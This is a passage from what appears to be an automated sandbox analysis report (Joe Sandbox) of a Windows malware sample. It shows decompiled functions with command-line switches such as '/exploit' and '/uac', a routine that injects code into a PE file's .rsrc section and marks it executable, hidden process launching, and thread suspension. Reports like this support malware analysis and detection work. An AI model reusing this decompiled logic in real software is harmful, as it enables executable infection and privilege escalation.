      • Part of subcall function 00D31434: GetLastError.KERNEL32(?,?), ref: 00D31446
      • Part of subcall function 00D31434: CloseHandle.KERNEL32(00000000), ref: 00D3145E
      • Part of subcall function 00D32481: ExitProcess.KERNEL32 ref: 00D324A3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$Handle$File$CloseVersion$LocalPathProcessTempToken$CountModule$DeleteFreeTick$AdminCurrentDirectoryInformationUser_memset_strlenwsprintf$CommandCreateLineName$AddressAllocAuthorityClipboardFormatMoveOpenProcSystemWindows$ArgvCheckCopyEventExitKnownLockMembershipMessageObjectReadRegisterSingleSizeSleepStationWaitWellWindowWork
    • String ID: "%s" /exploit$"%s" /uac
    • API String ID: 1631179323-107240129
    • Opcode ID: 628e5d43e16525fd4b099a876a1c387259a396dc70d42449417a1e8ae18bd366
    • Instruction ID: b29561f7684d5188d584a479a3702ac167fdecf6321cff030abdf477b973bcbe
    • Opcode Fuzzy Hash: 628e5d43e16525fd4b099a876a1c387259a396dc70d42449417a1e8ae18bd366
    • Instruction Fuzzy Hash: 2B41F37A90025A9BDF21EFA1DD45AEE7BACEF44340F040526FD18E2121EB759A45CF70
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 317 d32308-d3232e GetTickCount call d32001 call d322dc 322 d32330-d32332 317->322 323 d32337-d3235d call d33510 GetVersionExA 317->323 324 d3247a-d3247e 322->324 327 d32370-d32374 323->327 328 d3235f-d3236e GetVersionExA 323->328 329 d32376-d3237a 327->329 330 d3237c-d32380 327->330 328->327 331 d32382-d32384 328->331 329->330 332 d32389-d323a3 GetCommandLineW CommandLineToArgvW 329->332 330->331 330->332 333 d32479 331->333 334 d32439-d3243f 332->334 335 d323a9-d323b0 332->335 333->324 338 d32441-d32447 334->338 339 d32449-d3244e 334->339 336 d323b2-d323c5 call d33a11 335->336 337 d32431-d32438 LocalFree 335->337 346 d323d3-d323e3 call d33a11 336->346 347 d323c7-d323d1 336->347 337->334 338->339 341 d32450-d32456 339->341 342 d32458-d3245d 339->342 341->342 344 d32467-d3246c 342->344 345 d3245f-d32465 342->345 348 d32476-d32478 344->348 349 d3246e-d32474 344->349 345->344 353 d323f1-d32401 call d33a11 346->353 354 d323e5-d323ef 346->354 350 d3242b-d3242f 347->350 348->333 349->348 350->336 350->337 357 d32403-d3240d 353->357 358 d3240f-d3241f call d33a11 353->358 354->350 357->350 358->350 361 d32421 358->361 361->350
    C-Code - Quality: 100%
    			E00D32308(void* __eflags) {
    				void* _t29;
    				void* _t33;
    				void* _t34;
    				void* _t35;
    				void* _t36;
    				signed int _t38;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				int _t45;
    				void* _t47;
    				void _t49;
    				void _t50;
    				void _t51;
    				void _t52;
    				signed int _t63;
    				void* _t70;
    				void* _t72;
    				void* _t76;
    
    				_t76 = __eflags;
    				_t70 = _t72 - 0x64;
    				E00D32001(GetTickCount());
    				 *0xd35a00 =  *((intOrPtr*)(_t70 + 0x6c));
    				if(E00D322DC(_t76) == 0) {
    					E00D33510(_t70 - 0x3c, 0, 0x9c);
    					 *(_t70 - 0x3c) = 0x9c;
    					_t29 = GetVersionExA(_t70 - 0x3c);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						L4:
    						__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 5;
    						if( *((intOrPtr*)(_t70 - 0x38)) != 5) {
    							L6:
    							__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 6;
    							if( *((intOrPtr*)(_t70 - 0x38)) >= 6) {
    								L8:
    								 *(_t70 + 0x60) =  *(_t70 + 0x60) & 0x00000000;
    								_t47 = CommandLineToArgvW(GetCommandLineW(), _t70 + 0x60);
    								__eflags = _t47;
    								if(_t47 == 0) {
    									L20:
    									_t33 =  *(_t70 + 0x70);
    									__eflags = _t33;
    									if(_t33 != 0) {
    										_t52 =  *0xd35a04; // 0x0
    										 *_t33 = _t52;
    									}
    									_t34 =  *(_t70 + 0x74);
    									__eflags = _t34;
    									if(_t34 != 0) {
    										_t51 =  *0xd35a08; // 0x0
    										 *_t34 = _t51;
    									}
    									_t35 =  *(_t70 + 0x78);
    									__eflags = _t35;
    									if(_t35 != 0) {
    										_t50 =  *0xd35a0c; // 0x0
    										 *_t35 = _t50;
    									}
    									_t36 =  *(_t70 + 0x7c);
    									__eflags = _t36;
    									if(_t36 != 0) {
    										_t49 =  *0xd35a10; // 0x0
    										 *_t36 = _t49;
    									}
    									_t38 = 1;
    									__eflags = 1;
    									L29:
    									goto L30;
    								}
    								_t63 = 1;
    								__eflags =  *(_t70 + 0x60) - 1;
    								if( *(_t70 + 0x60) <= 1) {
    									L19:
    									LocalFree(_t47);
    									goto L20;
    								} else {
    									goto L10;
    								}
    								do {
    									L10:
    									_t69 = _t47 + _t63 * 4;
    									_t40 = E00D33A11( *(_t47 + _t63 * 4), L"/runmain");
    									__eflags = _t40;
    									if(_t40 != 0) {
    										_t41 = E00D33A11( *_t69, L"/exploit");
    										__eflags = _t41;
    										if(_t41 != 0) {
    											_t42 = E00D33A11( *_t69, L"/uac");
    											__eflags = _t42;
    											if(_t42 != 0) {
    												_t43 = E00D33A11( *_t69, L"/executable");
    												__eflags = _t43;
    												if(_t43 == 0) {
    													 *0xd35a10 = 1;
    												}
    											} else {
    												 *0xd35a0c = 1;
    											}
    										} else {
    											 *0xd35a08 = 1;
    										}
    									} else {
    										 *0xd35a04 = 1;
    									}
    									_t63 = _t63 + 1;
    									__eflags = _t63 -  *(_t70 + 0x60);
    								} while (_t63 <  *(_t70 + 0x60));
    								goto L19;
    							}
    							L7:
    							_t38 = 0;
    							goto L29;
    						}
    						__eflags =  *((intOrPtr*)(_t70 - 0x34)) - 1;
    						if( *((intOrPtr*)(_t70 - 0x34)) >= 1) {
    							goto L8;
    						}
    						goto L6;
    					}
    					 *(_t70 - 0x3c) = 0x94;
    					_t45 = GetVersionExA(_t70 - 0x3c);
    					__eflags = _t45;
    					if(_t45 == 0) {
    						goto L7;
    					}
    					goto L4;
    				} else {
    					_t38 = 0;
    					L30:
    					return _t38;
    				}
    			}























    0x00d32308
    0x00d32309
    0x00d3231a
    0x00d32322
    0x00d3232e
    0x00d32344
    0x00d3234f
    0x00d32359
    0x00d3235b
    0x00d3235d
    0x00d32370
    0x00d32370
    0x00d32374
    0x00d3237c
    0x00d3237c
    0x00d32380
    0x00d32389
    0x00d32389
    0x00d3239f
    0x00d323a1
    0x00d323a3
    0x00d32439
    0x00d32439
    0x00d3243d
    0x00d3243f
    0x00d32441
    0x00d32447
    0x00d32447
    0x00d32449
    0x00d3244c
    0x00d3244e
    0x00d32450
    0x00d32456
    0x00d32456
    0x00d32458
    0x00d3245b
    0x00d3245d
    0x00d3245f
    0x00d32465
    0x00d32465
    0x00d32467
    0x00d3246a
    0x00d3246c
    0x00d3246e
    0x00d32474
    0x00d32474
    0x00d32478
    0x00d32478
    0x00d32479
    0x00000000
    0x00d32479
    0x00d323ac
    0x00d323ad
    0x00d323b0
    0x00d32431
    0x00d32432
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d323b2
    0x00d323b2
    0x00d323b2
    0x00d323bc
    0x00d323c3
    0x00d323c5
    0x00d323da
    0x00d323e1
    0x00d323e3
    0x00d323f8
    0x00d323ff
    0x00d32401
    0x00d32416
    0x00d3241d
    0x00d3241f
    0x00d32421
    0x00d32421
    0x00d32403
    0x00d32403
    0x00d32403
    0x00d323e5
    0x00d323e5
    0x00d323e5
    0x00d323c7
    0x00d323c7
    0x00d323c7
    0x00d3242b
    0x00d3242c
    0x00d3242c
    0x00000000
    0x00d323b2
    0x00d32382
    0x00d32382
    0x00000000
    0x00d32382
    0x00d32376
    0x00d3237a
    0x00000000
    0x00000000
    0x00000000
    0x00d3237a
    0x00d32363
    0x00d3236a
    0x00d3236c
    0x00d3236e
    0x00000000
    0x00000000
    0x00000000
    0x00d32330
    0x00d32330
    0x00d3247a
    0x00d3247e
    0x00d3247e

    APIs
    • GetTickCount.KERNEL32 ref: 00D32313
      • Part of subcall function 00D322DC: GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
      • Part of subcall function 00D322DC: CloseHandle.KERNEL32(00000000), ref: 00D322FD
    • _memset.LIBCMT ref: 00D32344
    • GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D32359
    • GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00D3236A
    • GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00D32392
    • CommandLineToArgvW.SHELL32(00000000), ref: 00D32399
    • LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00D32432
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: CommandLineVersion$ArgvCloseCountErrorFreeHandleLastLocalTick_memset
    • String ID: /executable$/exploit$/runmain$/uac
    • API String ID: 2049752164-780269054
    • Opcode ID: 05ec0481d0d5ea4be8dadb568f5ee84bc3ab8b79aed7fbd722172503574a99b4
    • Instruction ID: a538e9d14dc62b16bdb185e55f375c1c02aab3721135248199f41f702295b3ab
    • Opcode Fuzzy Hash: 05ec0481d0d5ea4be8dadb568f5ee84bc3ab8b79aed7fbd722172503574a99b4
    • Instruction Fuzzy Hash: 75419936E0434ADBDB24DFA9EC81AAA37E8FB14350F140529E851D3260EB74E844DB30
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 91%
    			E00D32F02(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				void* _t50;
    				void* _t66;
    				char* _t72;
    				void* _t78;
    				signed int _t80;
    				intOrPtr* _t82;
    				void* _t87;
    
    				_v16 = 0xd32f01;
    				_t50 = E00D320EC(_a12);
    				_v8 = _v8 & 0x00000000;
    				_v12 = _t50 + 0xd32f01 - E00D32E88 + 0x111;
    				_t87 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_t80 =  *(_t87 + 6) & 0x0000ffff;
    				_t78 = ( *(_t87 + 0x14) & 0x0000ffff) + _t87 + 0x18;
    				if(_t80 == 0) {
    					L11:
    					return 1;
    				}
    				while(E00D3214C(_t78, ".rsrc", 5) != 0) {
    					_t78 = _t78 + 0x28;
    					_v8 = _v8 + 1;
    					if(_v8 < _t80) {
    						continue;
    					}
    					goto L11;
    				}
    				if( *((intOrPtr*)(_t78 + 0x10)) >= _v12) {
    					_t82 =  *((intOrPtr*)(_t78 + 0x14)) + _a4;
    					E00D320CE(_t82, 0, 0x110);
    					 *((intOrPtr*)(_t82 + 8)) =  *((intOrPtr*)(_t87 + 0x28));
    					 *_t82 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    					 *((intOrPtr*)(_t82 + 4)) = GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");
    					if(_a16 != 0) {
    						E00D32194(_t82 + 0xc, _a16);
    					}
    					E00D32194(_t82 + 0x110, _a12);
    					_t66 = E00D320EC(_a12);
    					_t32 = _t82 + 0x111; // 0x111
    					E00D320AE(_t66 + _t32, E00D32E88, _v16);
    					 *((intOrPtr*)(_t87 + 0x28)) = E00D320EC(_a12) +  *((intOrPtr*)(_t78 + 0xc)) + 0x111;
    					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x20000000;
    					 *((intOrPtr*)(_t87 + 0x88)) = 0;
    					 *((intOrPtr*)(_t87 + 0x8c)) = 0;
    					_v12 = 0;
    					_v8 = 0;
    					_t72 =  &_v12;
    					__imp__CheckSumMappedFile(_a4, _a8, _t72,  &_v8);
    					if(_t72 == 0) {
    						GetLastError();
    					} else {
    						 *(_t87 + 0x58) = _v8;
    					}
    					goto L11;
    				}
    				return 0;
    			}













    0x00d32f19
    0x00d32f1c
    0x00d32f21
    0x00d32f2c
    0x00d32f35
    0x00d32f37
    0x00d32f3f
    0x00d32f45
    0x00d3305b
    0x00000000
    0x00d3305d
    0x00d32f4b
    0x00d32f5c
    0x00d32f5f
    0x00d32f65
    0x00000000
    0x00000000
    0x00000000
    0x00d32f67
    0x00d32f72
    0x00d32f7e
    0x00d32f89
    0x00d32f9b
    0x00d32fb5
    0x00d32fc8
    0x00d32fcb
    0x00d32fd4
    0x00d32fd4
    0x00d32fe3
    0x00d32feb
    0x00d32ff3
    0x00d33000
    0x00d33017
    0x00d3301a
    0x00d33023
    0x00d33029
    0x00d3302f
    0x00d33032
    0x00d33039
    0x00d33043
    0x00d3304b
    0x00d33055
    0x00d3304d
    0x00d33050
    0x00d33050
    0x00000000
    0x00d3304b
    0x00000000

    APIs
      • Part of subcall function 00D320CE: _memset.LIBCMT ref: 00D320E1
    • GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
    • GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
    • GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
    • GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
    • CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
    • GetLastError.KERNEL32 ref: 00D33055
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: AddressHandleModuleProc$CheckErrorFileLastMapped_memset
    • String ID: .rsrc$LoadLibraryA$WinExec$kernel32.dll
    • API String ID: 600805798-1606967582
    • Opcode ID: 08a7c4b4ee29f6c8779f4ed9cc2d59d6afeebf209540328be431069bd7d40993
    • Instruction ID: 6a18c821a77470199e8c3242b158ce6c84d45be96a5a713ab08a68f383492c0a
    • Opcode Fuzzy Hash: 08a7c4b4ee29f6c8779f4ed9cc2d59d6afeebf209540328be431069bd7d40993
    • Instruction Fuzzy Hash: 4141477590030AEFCB149FA4C945AEABBB8EF08304F104525F959E7251E771EA58DBB0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 80%
    			E00D32AF9(DWORD* _a4, intOrPtr _a8, char _a12) {
    				CHAR* _v8;
    				struct _PROCESS_INFORMATION _v24;
    				struct _STARTUPINFOA _v92;
    				intOrPtr* _t23;
    				char* _t24;
    				void* _t45;
    				long _t49;
    
    				_t23 = _a4;
    				_v8 = 0;
    				if(_t23 != 0) {
    					 *_t23 = 0;
    				}
    				_t24 =  &_a12;
    				_push(_t24);
    				_push(_a8);
    				E00D33E9D();
    				_t45 = LocalAlloc(0x40, _t24 + 0x100);
    				if(_t45 != 0) {
    					_push( &_a12);
    					_push(_a8);
    					_push(_t45);
    					E00D33E92();
    					E00D33510( &_v24, 0, 0x10);
    					_t49 = 0x44;
    					E00D33510( &_v92, 0, _t49);
    					_v92.cb = _t49;
    					GetStartupInfoA( &_v92);
    					_v92.wShowWindow = 0;
    					_v92.dwFlags = 1;
    					if(CreateProcessA(0, _t45, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) == 0) {
    						GetLastError();
    					} else {
    						WaitForSingleObject(_v24.hProcess, 0xffffffff);
    						if(_a4 != 0) {
    							GetExitCodeProcess(_v24.hProcess, _a4);
    						}
    						CloseHandle(_v24.hThread);
    						CloseHandle(_v24);
    						_v8 = 1;
    					}
    					LocalFree(_t45);
    					return _v8;
    				} else {
    					return 0;
    				}
    			}










    0x00d32aff
    0x00d32b06
    0x00d32b0b
    0x00d32b0d
    0x00d32b0d
    0x00d32b0f
    0x00d32b12
    0x00d32b13
    0x00d32b16
    0x00d32b2b
    0x00d32b2f
    0x00d32b3c
    0x00d32b3d
    0x00d32b40
    0x00d32b41
    0x00d32b4d
    0x00d32b54
    0x00d32b5b
    0x00d32b67
    0x00d32b6a
    0x00d32b72
    0x00d32b89
    0x00d32b94
    0x00d32bc7
    0x00d32b96
    0x00d32b9b
    0x00d32ba4
    0x00d32bac
    0x00d32bac
    0x00d32bbb
    0x00d32bc0
    0x00d32bc2
    0x00d32bc2
    0x00d32bce
    0x00000000
    0x00d32b31
    0x00000000
    0x00d32b31

    APIs
    • LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00D32B25
    • _memset.LIBCMT ref: 00D32B4D
    • _memset.LIBCMT ref: 00D32B5B
    • GetStartupInfoA.KERNEL32(?), ref: 00D32B6A
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D32D96), ref: 00D32B8C
    • WaitForSingleObject.KERNEL32(00D32D96,000000FF), ref: 00D32B9B
    • GetExitCodeProcess.KERNEL32(00D32D96,?), ref: 00D32BAC
    • CloseHandle.KERNEL32(00000000), ref: 00D32BBB
    • CloseHandle.KERNEL32(00D32D96), ref: 00D32BC0
    • GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00D32BC7
    • LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00D32BCE
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: CloseHandleLocalProcess_memset$AllocCodeCreateErrorExitFreeInfoLastObjectSingleStartupWait
    • String ID:
    • API String ID: 3970834964-0
    • Opcode ID: c834e75f99b2733470247063f7e6d9736dff0f20690f336dca8ca565fe5bf3f7
    • Instruction ID: b00dafde57eeffb1db34ee39f1cc474c1f8bc3fcc247eab0aea0d2aa30fa3675
    • Opcode Fuzzy Hash: c834e75f99b2733470247063f7e6d9736dff0f20690f336dca8ca565fe5bf3f7
    • Instruction Fuzzy Hash: 26218EB6900259AFCB11AFE4DD89DEFBBBCEF08711F104522F605E6154D6709A80DBB1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 409 d31c33-d31c4d CreateToolhelp32Snapshot 410 d31c4f-d31c73 Thread32First 409->410 411 d31ccc GetLastError 409->411 412 d31cc0 GetLastError 410->412 413 d31c75 410->413 414 d31cd2-d31cd7 411->414 416 d31cc6-d31cca CloseHandle 412->416 415 d31c76-d31c7c 413->415 417 d31caf-d31cbb Thread32Next 415->417 418 d31c7e-d31c85 415->418 416->414 417->415 421 d31cbd-d31cbe 417->421 419 d31c87-d31c8a 418->419 420 d31c8c-d31c9b OpenThread 418->420 419->417 419->420 420->417 422 d31c9d-d31ca7 SuspendThread 420->422 421->416 423 d31ca9 422->423 424 d31cac-d31cad CloseHandle 422->424 423->424 424->417
    C-Code - Quality: 100%
    			E00D31C33(int _a4, intOrPtr _a8) {
    				signed int _v8;
    				intOrPtr _v24;
    				long _v28;
    				void _v32;
    				void* _v36;
    				long _t29;
    				void* _t33;
    				signed int _t34;
    				void* _t42;
    
    				_v8 = _v8 & 0x00000000;
    				_t33 = CreateToolhelp32Snapshot(4, _a4);
    				if(_t33 == 0xffffffff) {
    					GetLastError();
    					L15:
    					return _v8;
    				}
    				_t34 = 6;
    				memset( &_v32, 0, _t34 << 2);
    				_v36 = 0x1c;
    				if(Thread32First(_t33,  &_v36) == 0) {
    					GetLastError();
    					goto L13;
    				} else {
    					do {
    						if(_v24 == _a4) {
    							_t29 = _v28;
    							if(_a8 == 0 || _t29 == _a8) {
    								_t42 = OpenThread(2, 0, _t29);
    								if(_t42 != 0) {
    									if(SuspendThread(_t42) != 0xffffffff) {
    										_v8 = _v8 + 1;
    									}
    									CloseHandle(_t42);
    								}
    							}
    						}
    					} while (Thread32Next(_t33,  &_v36) != 0);
    					L13:
    					CloseHandle(_t33);
    					goto L15;
    				}
    			}












    0x00d31c39
    0x00d31c48
    0x00d31c4d
    0x00d31ccc
    0x00d31cd2
    0x00d31cd7
    0x00d31cd7
    0x00d31c52
    0x00d31c58
    0x00d31c5f
    0x00d31c73
    0x00d31cc0
    0x00000000
    0x00d31c75
    0x00d31c76
    0x00d31c7c
    0x00d31c82
    0x00d31c85
    0x00d31c97
    0x00d31c9b
    0x00d31ca7
    0x00d31ca9
    0x00d31ca9
    0x00d31cad
    0x00d31cad
    0x00d31c9b
    0x00d31c85
    0x00d31cb9
    0x00d31cc6
    0x00d31cc7
    0x00000000
    0x00d31cc9

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00D31C43
    • Thread32First.KERNEL32(00000000,?), ref: 00D31C66
    • OpenThread.KERNEL32(00000002,00000000,00D31FAF,7622D965,00000000,00000004,?,00000000), ref: 00D31C91
    • SuspendThread.KERNEL32(00000000), ref: 00D31C9E
    • CloseHandle.KERNEL32(00000000), ref: 00D31CAD
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 00D31CB4
    • GetLastError.KERNEL32(00000000,00000004,?,00000000), ref: 00D31CC0
    • CloseHandle.KERNEL32(00000000), ref: 00D31CC7
    • GetLastError.KERNEL32(00000004,?,00000000,?,?,00D31FAF,00000000,00000000,00000000), ref: 00D31CCC
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: CloseErrorHandleLastThreadThread32$CreateFirstNextOpenSnapshotSuspendToolhelp32
    • String ID:
    • API String ID: 2698708724-0
    • Opcode ID: d00e0f1a5a065d98ea2226382c3ba1f3d9776f7e377732fd60ab602eb3a6c274
    • Instruction ID: c984cac7a99ecce17a928f8208aca285e63ef7db08bab2130a9f06108b457a29
    • Opcode Fuzzy Hash: d00e0f1a5a065d98ea2226382c3ba1f3d9776f7e377732fd60ab602eb3a6c274
    • Instruction Fuzzy Hash: 5B11C43E94021AABDB21ABA4CD45FEEB3B8AF48320F144111F901E6290D774DE458B71
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D3250C(void* __ecx, long _a4, void** _a8, long* _a12) {
    				struct _OVERLAPPED* _v8;
    				long _t12;
    				void* _t13;
    				void* _t19;
    				long* _t28;
    
    				_v8 = 0;
    				_t19 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t19 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_t12 = GetFileSize(_t19, 0);
    					_t28 = _a12;
    					 *_t28 = _t12;
    					_t13 = LocalAlloc(0x40, _t12);
    					 *_a8 = _t13;
    					if(_t13 == 0) {
    						GetLastError();
    						 *_t28 = 0;
    					} else {
    						_a4 = 0;
    						if(ReadFile(_t19, _t13,  *_t28,  &_a4, 0) == 0) {
    							GetLastError();
    						} else {
    							_v8 = 1;
    						}
    					}
    					CloseHandle(_t19);
    				}
    				return _v8;
    			}








    0x00d32523
    0x00d3252c
    0x00d32531
    0x00d3258c
    0x00d32533
    0x00d32536
    0x00d3253c
    0x00d32542
    0x00d32544
    0x00d3254d
    0x00d32551
    0x00d3257a
    0x00d32580
    0x00d32553
    0x00d3255a
    0x00d32567
    0x00d32572
    0x00d32569
    0x00d32569
    0x00d32569
    0x00d32567
    0x00d32583
    0x00d32589
    0x00d32598

    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
    • GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
    • LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
    • ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
    • GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
    • GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
    • CloseHandle.KERNEL32(00000000), ref: 00D32583
    • GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorFileLast$AllocCloseCreateHandleLocalReadSize
    • String ID:
    • API String ID: 541326989-0
    • Opcode ID: 9558574aae6c60e8ba8450b64c7f85d30d898653676be1d91e841d968fcf77c8
    • Instruction ID: b483551a5ae16dab9bb07ff5fd56bdc185f0f87c8ba8065b0754336e0692579b
    • Opcode Fuzzy Hash: 9558574aae6c60e8ba8450b64c7f85d30d898653676be1d91e841d968fcf77c8
    • Instruction Fuzzy Hash: 2C1139B8A00346FFD7245F65DC5CEAB7FBCEB99751F204508BA42D6250D6B19A80CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D32822(intOrPtr _a4) {
    				intOrPtr _v276;
    				intOrPtr _v292;
    				void* _v300;
    				int _t17;
    				void* _t18;
    
    				_t17 = 0;
    				_t18 = CreateToolhelp32Snapshot(2, 0);
    				if(_t18 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_v300 = 0x128;
    					if(Process32First(_t18,  &_v300) == 0) {
    						GetLastError();
    					} else {
    						while(_v292 != _a4) {
    							if(Process32Next(_t18,  &_v300) != 0) {
    								continue;
    							} else {
    							}
    							goto L7;
    						}
    						_t17 = _v276;
    					}
    					L7:
    					CloseHandle(_t18);
    				}
    				return _t17;
    			}








    0x00d3282d
    0x00d32837
    0x00d3283c
    0x00d3288e
    0x00d3283e
    0x00d32846
    0x00d32857
    0x00d3287f
    0x00d32859
    0x00d32859
    0x00d32873
    0x00000000
    0x00000000
    0x00d32875
    0x00000000
    0x00d32873
    0x00d32877
    0x00d32877
    0x00d32885
    0x00d32886
    0x00d32886
    0x00d32899

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D32832
    • Process32First.KERNEL32(00000000,?), ref: 00D32850
    • Process32Next.KERNEL32(00000000,00000128), ref: 00D3286C
    • GetLastError.KERNEL32(00000000,7622D965), ref: 00D3287F
    • CloseHandle.KERNEL32(00000000), ref: 00D32886
    • GetLastError.KERNEL32(00000000,7622D965), ref: 00D3288E
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLastProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3005108968-0
    • Opcode ID: b624bff7209880cc44c9ef2c8dd97ea14190ff6bc5d60bfb3d1ed16efd26155c
    • Instruction ID: 93857da8559719af2fc656bcd91145c74b100c7de9e7bb249f62d34997b08544
    • Opcode Fuzzy Hash: b624bff7209880cc44c9ef2c8dd97ea14190ff6bc5d60bfb3d1ed16efd26155c
    • Instruction Fuzzy Hash: 81F0F636E01225ABD724AB698C09EFE7B7CEF88361F040160F955D2180DB34DE95CAB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D324AA(long _a4, void* _a8, long _a12) {
    				void* _t14;
    				struct _OVERLAPPED* _t15;
    
    				_t15 = 0;
    				_t14 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0, 0);
    				if(_t14 == 0xffffffff) {
    					GetLastError();
    				} else {
    					_a4 = 0;
    					if(WriteFile(_t14, _a8, _a12,  &_a4, 0) == 0) {
    						GetLastError();
    					} else {
    						_t15 = 1;
    					}
    					FlushFileBuffers(_t14);
    					CloseHandle(_t14);
    				}
    				return _t15;
    			}





    0x00d324af
    0x00d324c5
    0x00d324ca
    0x00d324fe
    0x00d324cc
    0x00d324d4
